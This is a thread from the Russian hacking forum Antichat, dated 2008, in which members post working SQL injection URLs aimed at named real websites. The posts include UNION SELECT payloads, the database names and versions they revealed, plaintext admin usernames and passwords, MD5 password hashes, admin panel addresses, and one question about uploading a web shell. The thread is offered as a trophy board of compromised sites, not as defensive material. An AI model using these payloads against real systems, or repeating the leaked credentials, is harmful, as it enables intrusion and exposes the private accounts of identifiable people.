ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5371  
Старый 26.04.2008, 17:54
Аватар для 159932
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038

Репутация: 1385


По умолчанию

www.policynetwork.net
Цитата:
http://www.policynetwork.net/main/article.php?article_id=-505+union+select+1,2,3,4,5,concat_ws(0x3a,admin_us ername,admin_password),7,8,9,0,1,2,3,4,5,6,7,8+fro m+admin/*
4.0.20-standard-log
http://www.policynetwork.net/admin
kendra:v0nhayek
philip:v0nhayek
alec:v0nhayek
mark:v0nhayek
dawn:v0nhayek
marcsidwell:3rdfloor
caroline:v0nhayek
================================================== ==

www.practicalfishkeeping.co.uk
Цитата:
http://www.practicalfishkeeping.co.uk/pfk/pages/item.php?news=-1588+union+select+concat_ws(0x3a,administrator,pas s)+from+emap.administrators+limit+0,1/*
Matt Clarke:twolbperch
Jayne Phillips:ilovedavidsaxby
Rebecca Mee:iamthemanagerofpets
steve:hockey1
Bev Pearce:cheesywotsits
kate:ilikedatabases
Hannah:bluebellpub
Gareth:monkeyflaps
ian:forest
colleen:hockey
Цитата:
http://www.practicalfishkeeping.co.uk/pfk/pages/item.php?news=-1588+union+select+concat_ws(0x3a,id,directory_name ,company_name,company_type,contact_name,job_title, contact_email,company_website,password)+from+emap. directory+limit+1145,1/*
~1150 юзверей ..

Цитата:
http://www.practicalfishkeeping.co.uk/pfk/pages/item.php?news=-1588+union+select+concat_ws(0x3a,username,password )+from+practical_fishkeeping.members_details+limit +58111,1/*
приличное кол-во юзверей .. ~ 58к ..
 
Ответить с цитированием

  #5372  
Старый 26.04.2008, 18:16
Аватар для Saime
Saime
Новичок
Регистрация: 27.02.2008
Сообщений: 19
Провел на форуме:
34487

Репутация: 46
По умолчанию

williampenn.net

Цитата:
http://www.williampenn.net/writinginstruments.php?cc=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21--
http://www.williampenn.net/writinginstruments.php?cc=-1%20union%20select%201,2,concat(user(),0x3a,databa se(),0x3a,version()),4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21--
williampenn_db@208.109.181.71:williampenn_db:5.0.4 5-log
http://www.williampenn.net/writinginstruments.php?cc=-1%20union%20select%201,2,concat(username,0x3a,pass word),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21+from+login_table--
admin:wponline
 
Ответить с цитированием

  #5373  
Старый 26.04.2008, 18:33
Аватар для beerhack
beerhack
Участник форума
Регистрация: 01.03.2008
Сообщений: 149
Провел на форуме:
3395070

Репутация: 173
По умолчанию

http://www.oqbo.ru/read.php?block=-99999+union+select+1,2,3,4,5,concat_ws(0x3a,user() ,version(),database()),7,8,9/*

USER: u71738@10.10.223.233
VERSION: 5.0.45-log
DATABASE: u71738_oqbo

Есть табла
wp_users
~id
~user_login
~user_pass
~user_nicename
~user_email
~user_url
~user_registered
~user_activation_key
~user_status

но доступа к ней похоже нету

****************************************

http://pravostok.ru/ru/updates/index.php?from=10&id=-99999+union+select+1,2,concat_ws(0x3a,ADMINISTRATO R_ID,LOGIN,PASSWORD_MD5),4,5,6,7,8,9,10,11,12,13,1 4+from+ADMINISTRATOR/*

USER: pravostok@localhost
VERSION: 5.0.42
DATABASE: pravostok

ADMINISTRATOR
~ADMINISTRATOR_ID
~FIO
~LOGIN
~PASSWORD_MD5
~EMAIL
~IS_ROOT
~IS_LOCKED
~COUNT_BAD_ENTER

1:admin:b25483fbb2b1ed77fafbb0e7f42d1ea4
2:editor:911eb63cdea3eb02445404c5ef07d043
3: o_petr:92aff5dbd2bbe06c649e869f2135c720
4:news_editor:5b1620f0fbe4d77dcd8038bdf452aa24
5:editnews:e41edc7ad7e486391503ab6b0d474681
6:editij:59cd9699950909b9279715a812a06689
7:editornews:1f1c14601393842f6ad32c4dd275e235
8:wwww:e34a8899ef6468b74f8a1048419ccc8b(wwww)


Одминка тут: http://pravostok.ru/adm/

Последний раз редактировалось beerhack; 26.04.2008 в 18:39..
 
Ответить с цитированием

  #5374  
Старый 26.04.2008, 19:25
Аватар для XaCeRoC
XaCeRoC
Познающий
Регистрация: 18.02.2008
Сообщений: 72
Провел на форуме:
340286

Репутация: 83
Отправить сообщение для XaCeRoC с помощью ICQ
По умолчанию

l2world.uz

Цитата:
http://l2world.uz/dp/i-search.php?=1833&itemid=1833+union+%09select+versi on(),concat(user(),0x3a,user()),database(),4,5,6,7
Можно ли залить шелл ??
 
Ответить с цитированием

  #5375  
Старый 27.04.2008, 07:21
Аватар для neon_fx
neon_fx
Познающий
Регистрация: 22.02.2008
Сообщений: 74
Провел на форуме:
394753

Репутация: 120
По умолчанию

http://refe.org.ua/news.php?id=-178+union+select+1,2,3,version(),5,6,7,8,9,10,11,1 2,13,14,15/*

4.1.22-log
 
Ответить с цитированием

  #5376  
Старый 27.04.2008, 10:32
Аватар для Nelzone
Nelzone
Постоянный
Регистрация: 12.04.2008
Сообщений: 403
Провел на форуме:
4700216

Репутация: 261
По умолчанию

http://site.kz/index.php/newso/images/banners/news_unit.php?id=34658'
PostgreSQL

http://www.millionaireinyou.com/staff/view/?display=more&item_id=14'
PostgreSQL

http://arbitr.gov.ua/news.php?sub_section=2&news_id=9'
PostgreSQL
 
Ответить с цитированием

  #5377  
Старый 27.04.2008, 13:52
Аватар для Zitt
Zitt
Познавший АНТИЧАТ
Регистрация: 07.05.2006
Сообщений: 1,031
Провел на форуме:
5885100

Репутация: 773


Отправить сообщение для Zitt с помощью ICQ
По умолчанию

http://www.wfsj.org/projects/page.php?id=-99999+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(U SER(),%20%200x71),0x71),5,6,7,8,9,10,11/*
 
Ответить с цитированием

  #5378  
Старый 27.04.2008, 18:57
Аватар для Kaimi
Kaimi
Reservists Of Antichat - Level 6
Регистрация: 23.08.2007
Сообщений: 1,237
Провел на форуме:
18127311

Репутация: 1676


Отправить сообщение для Kaimi с помощью ICQ
По умолчанию

http://www.zemax.ru/rsochi/search.php?otype_s=1&district_s=9999999%20union+se lect+1,2,3,4,5,6,7,concat(user(),0x7c,version(),0x 7c,database()),9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 ,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,5 4,55,56,57,58+from+users/*
 
Ответить с цитированием

  #5379  
Старый 28.04.2008, 01:52
Аватар для neon_fx
neon_fx
Познающий
Регистрация: 22.02.2008
Сообщений: 74
Провел на форуме:
394753

Репутация: 120
По умолчанию

http://www.blackbelt.com.ua/show.php?rand=1&id=-281+union+select+1,2,3,user(),version(),6,7,8,9,10 ,11,12,13,14,15+from+mysql.user/*

4.1.22-standard-log
root@localhost
mysql.user доступна
root
5c46cc0a0b8560de


http://haty.com.ua/show.php?id=-90061+union+select+1,database(),3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,user(),version(),23,2 4,25/*

yegorkin_haty
yegorkin_haty@db.sirius.biz.ua
5.0.45-community-log

Последний раз редактировалось neon_fx; 28.04.2008 в 02:09..
 
Ответить с цитированием

  #5380  
Старый 28.04.2008, 13:05
Аватар для .acme
.acme
Участник форума
Регистрация: 08.11.2007
Сообщений: 102
Провел на форуме:
1266776

Репутация: 93
По умолчанию

Цитата:
http://www.renoise.com/songs.php?pg=styles&id=-1008+union+select+1,2,3,4,5,6,concat(COLUMN_NAME,0 x2,TABLE_NAME),8,9,10,11,12,13,14,15,16,17+from+IN FORMATION_SCHEMA.COLUMNS+limit+17,1--
user: jdbc@localhost
db: renoise_db
version: 5.0.32-Debian_7etch5-log
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ